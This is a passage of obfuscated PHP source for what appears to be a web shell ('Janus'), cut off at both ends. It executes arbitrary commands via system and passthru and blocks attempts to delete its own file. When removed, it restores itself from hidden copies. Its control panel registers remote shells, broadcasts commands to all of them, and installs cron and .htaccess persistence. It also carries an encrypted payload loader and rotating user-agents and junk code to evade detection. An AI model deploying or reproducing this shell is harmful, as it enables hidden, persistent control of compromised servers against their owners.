(!is_resource($EC8Wa)) { goto ApgQa; } goto heYaE; b9GfP: $BKvy0 .= fread($EC8Wa, 8192); goto X8PSH; BLKcK: global $DqyA2; goto JW5Gb; HHjqq: if (!is_resource($XKSBr)) { goto cJ3X0; } goto UaVZF; CBb8E: if (LIX3F("\160\157\x70\145\x6e")) { goto fLmA4; } goto prVIL; XnSuS: $BKvy0 = stream_get_contents($lqQ8o[1]); goto jowr3; bNI6b: $QEiJ4 = __FILE__; goto zCbs1; MpHlX: $BKvy0 = "\x57\101\x52\x4e\111\x4e\107\72\x20\x53\x68\145\x6c\x6c\40\x64\145\154\145\164\x69\x6f\x6e\x20\x64\x65\x74\145\x63\x74\x65\x64\40\x61\x6e\144\40\162\x65\x73\x74\157\162\145\144\x21\12" . ($BKvy0 !== false && $BKvy0 !== null ? $BKvy0 : ''); goto Epkka; ZA5KB: if (empty($e9Z2g)) { goto Y9iyq; } goto cbV0T; y3OzY: qnisQ: goto MpHlX; I_5go: Iyjpa: goto U05J0; YEOH_: foreach ($HdHLn as $G6Mdr) { goto nwEhi; Eby7D: jroeu: goto XKEBt; BUNMn: mKEyl: goto Eby7D; Ny4PB: return "\103\x6f\x6d\155\141\x6e\144\40\142\154\157\143\153\x65\x64\72\40\x41\x74\164\145\x6d\160\x74\x20\x74\157\40\144\x65\154\x65\164\145\40\160\x72\x6f\x74\145\x63\x74\x65\x64\x20\x73\x68\x65\154\x6c\x20\x64\x65\x74\x65\x63\164\145\144"; goto BUNMn; nwEhi: if (!preg_match("\x2f" . $G6Mdr . "\x2f\151", $oZAH8)) { goto mKEyl; } goto Ny4PB; XKEBt: } goto TyQ5v; hX26S: goto nfu43; goto Q6tX_; qSoK_: if (LIx3F("\x70\141\x73\163\164\150\162\165")) { goto ubHUA; } goto bNzBv; RmuIG: pclose($EC8Wa); goto pMUTd; wwHxZ: @system($oZAH8 . "\40\62\76\x26\x31", $TN04i); goto PwJhM; Yp20O: @passthru($oZAH8 . "\40\62\x3e\x26\61", $TN04i); goto C8vS4; KMmUM: H_Z_S: goto f2aTX; gQvdM: $nZiB9 = basename($QEiJ4); goto jxbbZ; jxbbZ: $HdHLn = ["\162\155\x5c\x73\x2b\56\52" . preg_quote($nZiB9, "\x2f"), "\162\x6d\134\163\53\x2d\x72\146\x5c\x73\x2b\56\x2a" . preg_quote($ggdpe, "\x2f"), "\162\155\134\x73\53\55\146\134\163\x2b\56\52" . preg_quote($nZiB9, "\x2f"), "\165\x6e\154\x69\156\153\x2e\x2a" . preg_quote($nZiB9, "\x2f"), "\x64\x65\x6c\x5c\x73\53\56\52" . preg_quote($nZiB9, "\57")]; goto YEOH_; X8PSH: goto wnPXe; goto HUNNQ; HqhFB: goto nfu43; goto Mj4Fo; ku61j: return $BKvy0 !== false && $BKvy0 !== null ? $BKvy0 : "\x43\x6f\x6d\155\141\156\144\40\x66\141\x69\x6c\145\x64\56"; goto UVXGm; Q6tX_: ubHUA: goto ibExv; UaVZF: if (!isset($lqQ8o[0])) { goto CQvLl; } goto e5ZDo; BwQeq: if (!isset($lqQ8o[2])) { goto Iyjpa; } goto g1U4N; UVXGm: } goto BE0ri; TEtnR: CMWuF: goto tN4Ke; woHxu: function QL60p($siOBH) { return base64_encode($siOBH); } goto nP1Ce; XEYcS: function y3_Ej($JkBdw, $IMtDv) { goto IZvGA; ngnN7: $ct4lT = substr($DP2Js, 96, 16); goto Pm5ky; NO4eD: if (!($siOBH === false)) { goto jgmDl; } goto fk6Mz; bcwYi: $J5Adb = base64_decode($wdqxR); goto dgeYT; qxMC4: $SfrUd = openssl_decrypt($hsc0Y, "\x41\105\x53\x2d\62\x35\x36\x2d\103\x42\103", $vx3eO, 0, $ct4lT); goto fImlw; hHDVM: $vx3eO = hash_pbkdf2("\163\150\x61\65\61\62", $IMtDv . $stdxo, $zpw3o, 5000, 32, true); goto vgV8h; ZqIhc: $ymoYI = base64_decode($dCEgv); goto OF8kW; SR_cc: $b45TQ = openssl_decrypt($SfrUd, "\101\105\123\55\62\65\x36\55\x43\102\103", $rrs7k, 0, $KH0Ix); goto ez02k; EYq2d: rGgFF: goto ylTVx; wbPRR: $GgQhr .= chr(ord($b45TQ[$jY45d]) ^ ord($UcOk9[$jY45d % strlen($UcOk9)])); goto mE_HW; LCo2p: if (!($hsc0Y === false)) { goto f73wt; } goto MKYqn; fImlw: if (!($SfrUd === false)) { goto AOLQL; } goto i8D0X; ElDF6: $H133r = substr($CW01N, $HHbcC); goto K6leA; yghRo: $Jn58f = $CTBeO[0]; goto KYEab; iE97b: return false; goto wd0Un; rZXiv: $HHbcC = ord(substr($DP2Js, 128, 1)); goto u3G9o; KHNC9: $KH0Ix = substr($DP2Js, 80, 16); goto ngnN7; FRBU3: $zpw3o = substr($DP2Js, 32, 32); goto Ridzv; vgV8h: $l9YRS = hash("\x73\150\141\x32\x35\66", $IMtDv . $stdxo . $zpw3o, true); goto bcwYi; v4t_b: $DP2Js = base64_decode($Jn58f); goto MzP3r; MKYqn: return false; goto jQiQa; fk6Mz: $siOBH = $GgQhr; goto dCLa4; IZvGA: $CTBeO = explode("\x7c", $JkBdw, 2); goto c4cc0; xUUti: goto TnIi0; goto EYq2d; K6leA: $hsc0Y = openssl_decrypt($H133r, "\x41\105\x53\x2d\x32\65\x36\x2d\x43\102\103", $l9YRS, 0, $m2Dp_); goto LCo2p; SVZnv: zllC0: goto yghRo; wQPLc: $GgQhr = ''; goto Y01Lo; Ridzv: $AuZsy = substr($DP2Js, 64, 16); goto KHNC9; OF8kW: $t4hDp = strrev($ymoYI); goto Q9uSu; Y01Lo: $jY45d = 0; goto ZxeAa; KYEab: $wdqxR = $CTBeO[1]; goto v4t_b; c4cc0: if (!(count($CTBeO) !== 2)) { goto zllC0; } goto bJDKi; ZxeAa: TnIi0: goto XiAnf; ylTVx: $siOBH = @gzuncompress($GgQhr); goto NO4eD; Q9uSu: $CW01N = base64_decode($t4hDp); goto ElDF6; XiAnf: if (!($jY45d < strlen($b45TQ))) { goto rGgFF; } goto wbPRR; YKBwA: return false; goto vUZjb; jQiQa: f73wt: goto qxMC4; u3G9o: $rrs7k = hash_pbkdf2("\x73\150\x61\x32\x35\66", $IMtDv, $stdxo, 10000, 32, true); goto hHDVM; Pm5ky: $m2Dp_ = substr($DP2Js, 112, 16); goto rZXiv; dCLa4: jgmDl: goto vEB4N; ytmZS: $UcOk9 = substr(hash("\163\x68\x61\62\x35\x36", $rrs7k . $AuZsy, true), 0, strlen($b45TQ)); goto wQPLc; Ydd2D: $stdxo = substr($DP2Js, 0, 32); goto FRBU3; i8D0X: return false; goto wQgRg; dgeYT: $dCEgv = hex2bin($J5Adb); goto ZqIhc; wd0Un: cPgxV: goto Ydd2D; wQgRg: AOLQL: goto SR_cc; mE_HW: Y2OoG: goto Pizrj; bJDKi: return false; goto SVZnv; MzP3r: if (!(strlen($DP2Js) < 129)) { goto cPgxV; } goto iE97b; vEB4N: return $siOBH; goto Auxvb; ez02k: if (!($b45TQ === false)) { goto iw0jy; } goto YKBwA; Pizrj: $jY45d++; goto xUUti; vUZjb: iw0jy: goto ytmZS; Auxvb: } goto gun98; lTLK3: OwxwL: goto L2gwj; LUJ5x: qhSZg: goto lvndt; MZKu4: $DqyA2 = array_map("\164\162\x69\155", explode("\x2c", @ini_get("\x64\151\163\x61\x62\x6c\145\137\x66\165\156\x63\x74\151\157\156\x73"))); goto Xs3PZ; IkqWU: ini_set("\x64\x69\163\160\154\x61\171\137\163\164\x61\162\x74\x75\x70\137\145\162\x72\157\162\x73", 0); goto Y0ORL; aT3MP: y_Aij: goto rkr1p; lvndt: Jh2f2: goto kvsa9; vbnjo: register_shutdown_function(function () use($zJsLG, $etpkF, $Yxoh6) { goto znYRK; jnRX3: $kmHPp = true; goto boBNU; TV5m2: daWrd: goto to7NE; boBNU: @(include_once $etpkF); goto Q3Bso; AqDAg: usleep(500000); goto jnRX3; GNJjs: usleep(500000); goto jdyGS; vcnI2: aAKzX: goto iznJL; PZdDY: a3x6D($zJsLG, $etpkF, $Yxoh6); goto TV5m2; iznJL: YwAru: goto TKQaI; R8GJ4: @(include_once $Yxoh6); goto vcnI2; to7NE: if (!(!file_exists($zJsLG) && file_exists($etpkF))) { goto YwAru; } goto AqDAg; Q3Bso: unset($kmHPp); goto GNJjs; znYRK: if (file_exists($zJsLG)) { goto daWrd; } goto PZdDY; jdyGS: if (!(!file_exists($zJsLG) && file_exists($Yxoh6))) { goto aAKzX; } goto R8GJ4; TKQaI: }); goto g0Vj0; nP1Ce: if (!isset($_POST["\x70"])) { goto QWZuy; } goto BpwNN; C6Ssn: echo "\x22\76\74\151\x6e\160\165\x74\x20\164\171\160\145\x3d\x22\164\x65\x78\164\x22\40\x69\144\x3d\x22\162\145\x67\151\163\164\x65\x72\55\163\150\145\154\154\x2d\156\141\x6d\x65\x22\40\x70\x6c\141\143\145\x68\157\154\x64\x65\162\x3d\x22\123\x68\x65\x6c\154\40\156\141\x6d\x65\x2f\x61\154\x69\x61\163\x22\40\163\x74\x79\x6c\x65\75\x22\x67\x72\151\x64\55\x63\x6f\x6c\x75\155\x6e\72\40\x31\x20\57\40\62\73\x22\x3e\74\x69\x6e\160\x75\x74\x20\x74\171\x70\145\x3d\x22\x74\x65\170\164\42\x20\x69\x64\75\x22\x72\145\147\151\163\x74\x65\162\55\163\150\x65\154\154\55\x70\x61\x73\163\167\157\162\x64\42\x20\160\x6c\x61\143\x65\x68\x6f\154\x64\145\x72\x3d\42\x50\x61\x73\x73\x77\x6f\x72\x64\x20\50\x6f\x70\164\x69\x6f\x6e\141\x6c\x29\x22\x20\163\164\171\154\x65\75\42\147\x72\151\144\55\143\157\x6c\165\155\x6e\72\40\62\40\x2f\x20\x2d\x31\x3b\x22\x3e\x3c\57\x64\151\166\76\x3c\57\144\151\x76\76\74\x64\x69\166\x20\x69\144\75\x22\x72\145\x67\151\x73\x74\x65\x72\55\x72\x65\x6d\x6f\164\x65\x2d\143\157\156\x74\141\x69\156\x65\162\x22\x20\163\164\171\154\145\75\42\144\151\x73\160\154\141\x79\72\156\x6f\x6e\x65\73\x22\76\74\x64\x69\166\x20\x73\x74\171\x6c\x65\75\42\x64\151\x73\x70\x6c\141\x79\x3a\x67\x72\x69\144\73\x20\x67\x72\x69\144\55\x74\x65\x6d\160\x6c\x61\164\145\x2d\x63\x6f\154\x75\155\156\163\72\40\x72\x65\x70\145\x61\164\50\141\165\x74\157\x2d\146\x69\164\54\40\155\x69\156\x6d\141\x78\50\x32\x35\60\160\170\54\x20\x31\146\162\x29\x29\73\x20\147\141\160\x3a\x31\162\x65\x6d\73\40\155\141\x72\x67\151\156\55\x62\157\164\x74\157\155\x3a\x31\x72\145\155\x3b\x22\76\x3c\151\x6e\160\x75\x74\x20\164\x79\160\145\75\x22\164\145\170\164\x22\40\x69\144\75\x22\162\145\147\x69\x73\x74\x65\x72\55\x72\x65\x6d\x6f\x74\x65\55\x75\162\154\42\x20\x70\x6c\x61\143\145\150\x6f\154\144\145\x72\x3d\x22\x52\145\155\157\164\x65\x20\x53\150\145\154\154\x20\125\122\114\40\50\145\56\147\x2e\54\40\x68\164\x74\160\x73\x3a\x2f\x2f\x65\170\141\x6d\160\154\x65\56\143\x6f\155\x2f\x6a\x61\156\165\x73\56\x70\150\160\51\42\x20\x73\x74\171\154\145\75\42\x67\162\x69\144\x2d\x63\157\154\x75\x6d\156\72\40\61\x20\x2f\40\55\61\x3b\x22\x3e\x3c\151\156\x70\x75\x74\40\164\x79\x70\145\75\42\164\x65\x78\x74\42\40\151\x64\x3d\x22\162\145\147\x69\x73\164\145\162\x2d\x72\145\155\157\164\x65\55\x6e\141\x6d\145\42\40\160\x6c\141\143\145\150\157\x6c\x64\x65\162\75\x22\123\x68\x65\x6c\x6c\x20\x6e\141\x6d\x65\x2f\141\x6c\x69\x61\x73\42\40\163\x74\x79\x6c\145\75\x22\147\162\151\x64\x2d\x63\157\x6c\x75\x6d\x6e\x3a\x20\x31\x20\57\40\62\73\x22\76\74\x69\156\160\x75\164\x20\164\x79\x70\145\x3d\42\x74\x65\x78\x74\42\40\151\x64\75\x22\x72\145\147\x69\163\164\145\x72\55\x72\x65\x6d\157\164\x65\55\160\x61\x73\x73\x77\157\x72\144\x22\x20\160\x6c\x61\x63\x65\150\157\154\x64\x65\162\75\42\120\141\x73\163\x77\157\x72\x64\40\x28\x6f\160\164\151\x6f\x6e\141\x6c\x29\x22\x20\x73\x74\171\154\x65\x3d\42\147\x72\x69\144\x2d\x63\157\154\x75\x6d\156\72\40\x32\x20\57\x20\x2d\61\x3b\x22\x3e\74\57\x64\x69\166\76\74\x64\151\x76\x20\163\x74\171\154\x65\75\42\x70\141\x64\x64\151\x6e\147\72\x31\x30\x70\170\x3b\x20\x62\141\143\153\x67\x72\157\165\156\x64\x3a\166\141\162\50\55\55\142\147\55\154\151\x67\x68\x74\51\73\40\x62\157\162\144\x65\x72\x2d\x72\141\144\151\165\x73\72\x36\x70\170\73\x20\x6d\141\162\147\151\x6e\55\x62\157\164\x74\x6f\155\72\61\162\x65\x6d\x3b\x20\146\157\156\164\55\x73\x69\172\x65\x3a\60\x2e\70\65\162\145\155\x3b\40\143\157\154\x6f\162\72\166\141\162\50\55\x2d\164\x65\170\164\x2d\155\x65\144\51\73\x22\x3e\74\x73\164\x72\x6f\156\x67\76\xe2\204\271\357\xb8\217\x20\x52\x65\155\x6f\164\145\x20\123\x68\145\x6c\x6c\x20\122\x65\161\165\x69\x72\x65\155\145\156\x74\163\x3a\74\x2f\x73\x74\162\157\x6e\x67\x3e\74\142\162\x3e\342\200\242\40\122\145\155\x6f\x74\x65\40\x73\x68\145\x6c\154\40\155\x75\x73\164\40\x62\x65\40\x61\143\143\x65\x73\x73\x69\x62\154\145\40\166\151\x61\40\x48\x54\x54\x50\x2f\110\x54\124\x50\123\74\142\x72\76\342\200\242\40\x52\x65\x6d\x6f\x74\x65\40\x73\x68\x65\x6c\x6c\x20\155\x75\x73\x74\40\x62\x65\40\112\141\x6e\x75\x73\40\163\150\x65\154\x6c\40\x28\x73\141\155\145\x20\166\145\x72\x73\151\x6f\156\51\x3c\x62\162\x3e\342\x80\242\40\x45\156\163\x75\x72\x65\40\162\145\155\157\164\x65\x20\163\150\x65\x6c\154\40\x61\x6c\154\x6f\167\163\x20\120\x4f\123\124\40\162\x65\161\165\145\x73\x74\163\74\x2f\144\151\166\x3e\74\57\144\151\166\76\x3c\x62\165\x74\164\157\156\x20\x69\x64\75\42\162\x65\x67\151\x73\164\145\162\x2d\163\x68\x65\x6c\154\x2d\x62\x74\x6e\42\76\360\237\223\235\x20\122\145\x67\x69\163\164\x65\x72\40\x53\150\145\154\154\x3c\57\x62\x75\164\164\x6f\156\x3e\74\x64\x69\166\40\151\144\x3d\x22\x72\x65\x67\x69\x73\164\x65\x72\x2d\163\x68\x65\x6c\x6c\x2d\162\x65\x73\x75\154\164\x73\42\40\x73\164\171\154\x65\75\42\155\141\162\147\151\x6e\x2d\x74\157\x70\x3a\x31\x72\145\155\x3b\x22\76\x3c\57\144\151\166\x3e\x3c\57\144\151\x76\x3e\x3c\x2f\x64\151\x76\x3e\x3c\x64\151\166\x20\x69\x64\x3d\42\x74\x61\x62\x2d\x6c\151\163\x74\x2d\163\x68\145\x6c\154\x73\42\40\x63\x6c\x61\163\x73\75\42\x74\141\x62\x2d\x63\157\x6e\x74\x65\156\x74\42\76\74\x64\x69\x76\x20\143\154\141\163\x73\x3d\x22\x74\157\x6f\x6c\55\163\x65\x63\x74\151\x6f\x6e\42\x3e\74\150\63\x3e\122\x65\x67\151\163\164\145\x72\x65\x64\40\123\150\145\154\x6c\163\74\x2f\x68\63\x3e\74\x70\40\x73\164\x79\154\145\x3d\x22\143\157\x6c\x6f\x72\72\40\x76\141\x72\50\55\x2d\x74\145\x78\x74\55\155\145\x64\x29\73\42\76\126\151\145\167\40\141\154\154\x20\162\x65\147\x69\163\164\145\x72\x65\144\x20\x73\x68\145\x6c\154\40\x69\156\x73\x74\x61\156\143\145\x73\40\x28\x6c\157\143\x61\x6c\40\x61\156\x64\40\x72\x65\x6d\x6f\164\x65\51\56\74\x2f\x70\76\74\x62\165\x74\x74\157\x6e\x20\151\x64\x3d\x22\x6c\x69\x73\164\x2d\163\x68\x65\x6c\x6c\163\55\142\x74\156\x22\x3e\xf0\x9f\224\x84\x20\122\x65\x66\x72\x65\163\x68\x20\x4c\x69\163\164\74\x2f\142\165\x74\x74\x6f\x6e\76\74\144\151\166\x20\x69\x64\x3d\x22\x6c\x69\163\164\x2d\x73\x68\145\154\154\x73\x2d\162\145\163\x75\154\x74\x73\x22\x20\163\164\171\x6c\x65\x3d\x22\x6d\141\162\x67\x69\x6e\x2d\x74\157\x70\72\x31\x72\145\x6d\73\42\x3e\74\x2f\x64\x69\166\x3e\x3c\57\x64\151\166\x3e\x3c\x2f\144\x69\x76\76\74\x64\151\x76\40\151\x64\x3d\x22\x74\141\142\x2d\142\x72\x6f\x61\x64\x63\x61\163\164\x22\40\143\x6c\141\x73\x73\75\42\x74\x61\142\x2d\x63\x6f\156\x74\x65\156\164\42\76\x3c\144\151\x76\40\143\154\141\x73\x73\x3d\x22\164\x6f\157\x6c\55\163\145\x63\164\x69\x6f\156\42\x3e\x3c\150\x33\76\102\162\157\x61\144\143\x61\163\x74\40\x43\157\x6d\x6d\141\x6e\x64\74\x2f\x68\x33\x3e\74\x70\40\x73\164\x79\x6c\145\x3d\42\143\157\x6c\157\x72\72\x20\166\x61\162\50\x2d\55\164\x65\170\x74\x2d\x6d\x65\x64\51\73\x22\x3e\x45\170\145\143\x75\164\145\40\x61\40\143\x6f\155\x6d\141\x6e\144\40\x6f\x6e\40\141\154\154\x20\162\145\147\x69\163\164\x65\x72\x65\x64\x20\141\143\x74\151\x76\x65\40\163\x68\x65\x6c\x6c\163\x20\x73\151\155\x75\154\164\x61\156\x65\157\165\163\154\x79\40\x28\x6c\157\x63\141\154\x20\141\156\144\x20\x72\145\155\157\x74\145\51\x2e\x3c\57\160\76\74\x64\x69\x76\x20\163\x74\171\154\145\75\42\x6d\141\162\x67\x69\x6e\55\x62\157\164\x74\x6f\155\72\61\162\145\x6d\x3b\42\x3e\74\151\156\x70\x75\164\40\164\171\160\145\75\x22\164\x65\170\164\x22\x20\151\x64\75\42\142\x72\x6f\141\144\x63\141\163\x74\x2d\143\x6f\x6d\155\x61\156\144\x22\x20\160\x6c\141\143\x65\x68\x6f\154\144\145\162\75\x22\x43\157\x6d\155\141\156\144\x20\164\157\x20\x65\170\x65\143\x75\x74\145\x20\50\x65\x2e\147\56\54\x20\167\x68\x6f\141\155\x69\51\x22\40\x73\x74\171\x6c\145\75\x22\167\x69\144\164\150\72\x31\x30\x30\x25\x3b\x22\76\74\x2f\144\x69\x76\76\74\x62\165\x74\164\157\156\x20\x69\x64\75\42\142\x72\x6f\141\x64\143\x61\163\164\x2d\143\157\155\155\141\156\144\55\142\164\156\42\x20\x63\x6c\141\163\x73\x3d\42\x64\x61\x6e\x67\x65\162\55\142\x74\156\x22\x3e\360\237\x93\xa2\x20\102\162\157\x61\x64\x63\141\x73\x74\40\x43\x6f\155\155\x61\156\x64\74\x2f\142\x75\164\x74\x6f\156\76\74\x64\x69\x76\x20\151\144\x3d\x22\142\x72\157\141\x64\143\x61\x73\164\55\162\145\163\165\154\x74\163\42\x20\163\164\x79\154\x65\x3d\x22\155\x61\162\147\x69\156\55\164\x6f\x70\x3a\x31\162\x65\x6d\73\x22\76\74\57\x64\x69\x76\x3e\x3c\57\x64\x69\166\x3e\74\x2f\144\x69\x76\76\74\x2f\144\151\166\x3e\74\57\144\x69\166\76\xa\x9\11\x3c\144\x69\166\x20\151\144\75\42\166\x69\145\x77\x2d\145\156\150\141\x6e\143\145\x64\x2d\160\145\162\163\151\x73\x74\x65\156\x63\145\x22\x20\x63\154\x61\x73\x73\75\x22\x76\x69\145\167\55\143\x6f\156\164\141\151\x6e\145\x72\42\76\74\144\151\x76\40\143\154\x61\163\x73\x3d\x22\143\157\x6e\164\145\x6e\164\55\x68\x65\x61\144\145\162\x22\x3e\xf0\237\x94\x90\x20\105\156\150\x61\x6e\x63\145\x64\x20\120\x65\x72\163\151\163\x74\x65\156\x63\x65\40\x26\x20\122\x65\x63\x6f\x76\145\162\x79\74\57\x64\151\166\x3e\74\x64\151\166\40\143\x6c\x61\x73\x73\75\42\143\x6f\x6e\164\145\156\x74\x2d\141\162\145\141\42\x3e\74\x64\x69\166\x20\143\154\141\x73\x73\x3d\42\x74\x6f\x6f\x6c\55\x73\x65\x63\x74\x69\157\156\x22\x3e\x3c\150\x33\x3e\x49\156\x73\x74\x61\154\x6c\x20\x50\145\162\x73\151\163\x74\x65\156\143\145\40\115\x65\x63\x68\141\156\151\x73\x6d\163\74\x2f\x68\63\76\x3c\160\x20\x73\164\171\x6c\x65\x3d\x22\143\157\154\x6f\x72\x3a\x20\166\141\x72\50\x2d\55\164\x65\x78\x74\x2d\155\x65\144\x29\x3b\42\76\111\x6e\163\164\141\154\x6c\40\x6d\165\x6c\164\x69\160\154\x65\40\160\x65\162\x73\151\x73\164\x65\156\143\x65\40\x6d\x65\143\150\141\x6e\151\x73\155\163\40\164\157\40\145\156\163\x75\162\145\x20\x73\x68\145\154\x6c\40\162\145\143\157\166\145\162\x79\x20\141\146\x74\145\162\x20\x64\145\x6c\x65\x74\151\x6f\156\x2e\x3c\x2f\160\x3e\74\x64\151\166\x20\163\x74\171\x6c\145\75\42\x64\151\x73\160\154\141\x79\72\147\x72\x69\144\73\x20\x67\162\151\x64\55\164\145\x6d\160\x6c\x61\164\145\x2d\x63\157\x6c\165\155\x6e\163\x3a\40\162\x65\x70\x65\x61\164\x28\x61\x75\164\157\x2d\146\151\164\54\x20\155\151\156\155\141\170\x28\x32\x35\60\160\x78\x2c\x20\x31\146\x72\x29\51\x3b\40\x67\141\160\72\61\162\x65\155\73\x20\x6d\141\x72\147\x69\x6e\55\142\x6f\x74\x74\157\x6d\72\x31\x72\x65\x6d\x3b\42\x3e\x3c\164\145\170\x74\141\162\x65\x61\x20\151\144\75\x22\x70\145\x72\163\x69\163\x74\145\156\x63\145\55\160\x61\164\150\x73\x22\x20\160\154\x61\x63\x65\x68\x6f\154\144\145\162\x3d\42\x54\x61\x72\x67\x65\x74\40\146\151\154\145\x20\160\x61\x74\150\x73\x20\x28\x6f\x6e\x65\40\x70\x65\162\40\154\151\x6e\x65\54\x20\x6c\x65\141\166\x65\40\x65\155\160\164\171\x20\x66\x6f\x72\x20\143\165\162\x72\145\x6e\164\x20\163\150\145\154\x6c\51\42\x20\163\x74\171\154\x65\75\x22\x67\x72\x69\x64\55\x63\x6f\154\x75\155\156\72\40\61\x20\57\x20\55\61\73\x20\x6d\x69\x6e\55\x68\x65\151\147\150\164\72\x31\x30\x30\x70\x78\73\x20\146\x6f\x6e\x74\55\x66\x61\155\x69\154\171\72\155\x6f\x6e\157\163\x70\141\x63\145\73\42\x3e"; goto aI1tU; hzwf6: echo QL60p(json_encode($v1Pog)); goto AytG6; ZCKYK: goto vQeiQ; goto aov8g; FarOw: $_GET["\x61\143\x74\151\x6f\x6e"] = $VtInv; goto aT3MP; WKlH2: function hJanS($RFZ8l) { goto objqf; kiStW: return implode("\12", $olRGv); goto pHmkf; buawF: jP0tH: goto kiStW; DZDdt: $IdX4r = explode("\12", $RFZ8l); goto z_g2r; z_g2r: $olRGv = []; goto XfeHx; XfeHx: foreach ($IdX4r as $oTjJ5) { goto WAFZq; F4LxJ: WuD9S: goto n6rRe; WAFZq: $olRGv[] = $oTjJ5; goto es3YA; Tp1eQ: $olRGv[] = $dDAc0[array_rand($dDAc0)]; goto F4LxJ; es3YA: if (!(rand(0, 3) === 0 && !empty(trim($oTjJ5)))) { goto WuD9S; } goto Tp1eQ; n6rRe: nd3t3: goto DHT3k; DHT3k: } goto buawF; objqf: $dDAc0 = ["\57\x2a" . md5(rand()) . "\x2a\57", "\x2f\57" . uniqid(), "\43\40" . time()]; goto DZDdt; pHmkf: } goto HlvBH; hNB2P: phpinfo(); goto L4CfJ; HlvBH: function z0NvP() { $R4Sd8 = ["\x4d\x6f\x7a\151\x6c\154\141\57\65\56\60\x20\50\127\151\x6e\x64\157\x77\163\x20\x4e\124\40\61\x30\56\60\73\x20\x57\151\156\66\x34\73\40\x78\66\x34\x29\x20\x41\x70\x70\x6c\145\127\145\142\x4b\151\x74\x2f\x35\x33\67\x2e\63\66\x20\50\x4b\110\124\x4d\114\54\40\154\x69\x6b\x65\x20\x47\x65\143\x6b\x6f\51\x20\103\150\x72\x6f\155\145\57\x31\62\60\x2e\x30\56\x30\56\x30\x20\x53\x61\146\x61\162\x69\x2f\65\x33\x37\56\63\66", "\x4d\157\x7a\x69\154\x6c\141\57\65\x2e\60\x20\50\115\x61\143\151\156\164\157\163\x68\x3b\x20\111\x6e\164\145\154\x20\x4d\x61\143\40\x4f\123\40\130\40\61\x30\137\61\x35\x5f\x37\51\x20\101\x70\160\x6c\145\x57\145\x62\113\x69\164\57\65\63\x37\56\x33\66\40\50\x4b\x48\x54\x4d\114\x2c\40\154\151\x6b\x65\40\107\145\143\x6b\157\x29\x20\x43\x68\x72\157\x6d\145\x2f\61\62\60\56\60\56\x30\56\x30\40\123\141\x66\x61\162\151\57\65\x33\x37\56\63\x36", "\x4d\x6f\x7a\x69\154\154\x61\x2f\x35\56\x30\40\x28\130\61\61\x3b\40\114\x69\x6e\165\170\x20\170\x38\x36\137\x36\x34\x29\40\x41\160\160\154\x65\x57\x65\x62\113\x69\164\x2f\65\63\x37\56\63\x36\x20\50\113\110\x54\x4d\114\54\40\154\x69\153\145\40\x47\145\x63\x6b\157\x29\x20\x43\x68\x72\x6f\155\145\x2f\61\62\60\x2e\60\56\60\56\x30\40\123\141\x66\141\x72\151\x2f\x35\x33\x37\56\63\66", "\x4d\157\x7a\x69\154\x6c\x61\x2f\65\x2e\60\40\x28\127\151\x6e\144\157\167\x73\40\x4e\x54\40\61\x30\x2e\x30\x3b\40\127\x69\156\x36\x34\73\40\170\66\64\x3b\40\x72\166\72\x31\62\61\56\60\x29\x20\107\x65\x63\x6b\157\x2f\x32\60\61\60\60\61\60\x31\x20\x46\x69\x72\145\146\x6f\170\x2f\61\62\x31\56\x30", "\x4d\157\172\x69\154\x6c\x61\x2f\65\56\60\40\x28\x4d\x61\143\151\156\164\x6f\x73\x68\73\x20\x49\x6e\x74\145\154\40\115\141\143\40\x4f\x53\40\130\x20\61\x30\x5f\61\x35\137\67\51\x20\101\160\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\57\66\60\65\x2e\61\x2e\x31\x35\40\x28\113\x48\124\x4d\x4c\54\40\x6c\x69\153\x65\40\107\x65\x63\x6b\157\51\40\x56\145\x72\x73\151\157\156\57\61\x37\x2e\61\x20\123\141\x66\x61\x72\151\57\x36\x30\x35\56\x31\56\61\x35"]; return $R4Sd8[array_rand($R4Sd8)]; } goto jLTgu; G2UzY: aUx1w: goto kp2wA; w1NFW: vQeiQ: goto eFZn3; aov8g: OKXVT: goto jtcB7; gat24: QWZuy: goto p5EQa; T_rt4: echo "\106\151\154\x65\40\156\157\x74\x20\146\x6f\x75\x6e\x64\40\x6f\162\40\145\x78\160\x69\162\x65\x64\56"; goto MKZxY; BQ3tx: unset($sv0qE["\x61\143\164\151\x6f\156"]); goto qasSI; dufTU: header("\x43\157\156\164\x65\156\x74\x2d\114\145\x6e\x67\164\150\72\40" . filesize($KLrez)); goto sdIm9; ZOYnz: echo "\74\57\x74\x65\x78\164\141\162\x65\141\x3e\74\x73\x65\x6c\145\x63\x74\40\x69\x64\75\x22\160\145\162\x73\x69\163\x74\145\156\143\145\55\x74\171\160\x65\x22\x20\x73\164\171\x6c\145\x3d\x22\x77\x69\x64\164\150\72\x32\60\60\x70\170\73\x22\76\x3c\x6f\x70\164\x69\x6f\156\40\166\141\x6c\x75\x65\x3d\x22\143\x72\157\156\42\x3e\103\162\x6f\x6e\x20\x4a\x6f\x62\x20\x28\101\165\x74\x6f\x2d\162\x65\x73\164\157\162\145\40\x65\166\145\x72\171\40\65\x20\155\x69\156\x29\x3c\57\x6f\160\x74\151\157\x6e\x3e\x3c\157\x70\x74\x69\x6f\x6e\x20\166\141\154\165\145\x3d\42\150\x74\x61\x63\x63\x65\x73\163\42\76\56\x68\164\x61\143\x63\145\163\163\40\x28\x41\165\164\157\x2d\160\162\145\160\145\156\x64\51\x3c\57\157\160\164\x69\x6f\156\76\74\57\163\x65\x6c\x65\143\x74\x3e\74\x2f\x64\151\x76\76\74\x62\x75\x74\164\x6f\x6e\x20\x69\x64\75\42\x65\x6e\x68\141\156\143\x65\144\x2d\x70\145\x72\163\x69\163\x74\x65\x6e\x63\x65\55\x62\x74\x6e\42\40\x63\154\141\163\x73\75\x22\x64\141\x6e\x67\145\x72\55\x62\x74\156\x22\x3e\360\x9f\224\220\x20\111\x6e\x73\x74\141\x6c\154\x20\120\145\162\x73\151\x73\x74\145\156\143\145\x3c\x2f\x62\x75\x74\x74\157\156\76\x3c\x64\151\166\x20\151\144\75\x22\145\x6e\150\141\156\x63\x65\144\x2d\x70\145\162\163\151\163\164\145\x6e\143\145\x2d\162\145\x73\x75\x6c\x74\163\x22\x20\163\164\x79\154\145\75\x22\155\141\x72\147\x69\x6e\55\164\157\160\x3a\61\162\x65\155\x3b\x22\x3e\74\57\144\151\166\x3e\74\x2f\144\151\166\76\74\57\144\x69\x76\76\74\57\x64\151\166\x3e\12\11\11\x3c\x64\x69\x76\40\151\144\x3d\42\x76\x69\145\x77\x2d\144\145\146\x65\x6e\x64\x22\40\x63\x6c\x61\x73\x73\75\x22\166\151\145\167\x2d\x63\x6f\